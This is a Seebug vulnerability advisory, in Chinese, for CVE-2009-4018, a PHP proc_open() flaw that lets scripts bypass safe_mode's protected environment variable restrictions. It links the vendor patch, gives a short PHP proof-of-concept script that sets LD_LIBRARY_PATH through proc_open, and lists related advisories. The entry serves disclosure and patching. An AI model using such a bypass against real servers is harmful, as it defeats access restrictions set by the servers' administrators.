Lucene search
RootSSV:14994HistoryNov 30, 2009 - 12:00 a.m.
PHP proc_open()绕过safe_mode_protected_env_var限制漏洞
2009-11-3000:00:00
Root
www.seebug.org
53
0.022 Low
EPSS
Percentile
88.2%
BUGTRAQ ID: 37138
CVE ID: CVE-2009-4018
PHP是广泛使用的通用目的脚本语言,特别适合于Web开发,可嵌入到HTML中。
PHP没有执行任何检查便允许传送对proc_open所指定的环境变量,这就忽略了safe_mode_allowed_env_vars和safe_mode_protected_env_vars设置。用户可以绕过safe_mode限制访问Apache UID可访问的任意文件。
PHP 5.3.x
厂商补丁:
PHP
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://svn.php.net/viewvc/?view=revision&revision=286360
<?
putenv("BLAHBLAH=123");
putenv("LD_LIBRARY_PATH=/no/way");
putenv("PHP_TESTVAR=allowed");
$env = array('BLAHBLAH' => '123', 'LD_LIBRARY_PATH' => '/no/way',
'PHP_TESTVAR' => 'allowed');
$dptspec = array(0 => array("pipe", "r"),
1 => array("pipe", "w"));
$fp = proc_open('env', $dptspec, $pipes, './', $env);
echo "<pre>";
while(!feof($pipes[1])) echo fgets($pipes[1], 1024);
fclose($pipes[1]);
echo "</pre>";
?>
Related
seebug
seebug
Kolang (proc_open PHP safe mode bypass 4.3.10 - 5.3.0)
2010-03-06 00:00:00
ubuntucve
ubuntucve
CVE-2009-4018
2009-11-23 00:00:00
cve
cve
CVE-2009-4018
2009-11-29 13:07:00
prion
prion
Code injection
2009-11-29 13:07:00
exploitpack
exploitpack
Kolang 4.3.10 5.3.0 - proc_open() PHP safe_mode Bypass
2010-03-05 00:00:00
exploitdb
exploitdb
openvas
openvas
PHP Multiple Vulnerabilities (Dec 2009)
2009-12-04 00:00:00
Mandriva Security Advisory MDVSA-2009:303 (php)
2009-12-03 00:00:00
Mandriva Security Advisory MDVSA-2009:303 (php)
2009-12-03 00:00:00
nessus
nessus
Mandriva Linux Security Advisory : php (MDVSA-2009:304)
2009-11-30 00:00:00
Mandriva Linux Security Advisory : php (MDVSA-2009:303)
2010-07-30 00:00:00
PHP 5.3 < 5.3.1 Multiple Vulnerabilities
2009-11-20 00:00:00
securityvulns
securityvulns
ubuntu
ubuntu
PHP vulnerabilities
2009-11-26 00:00:00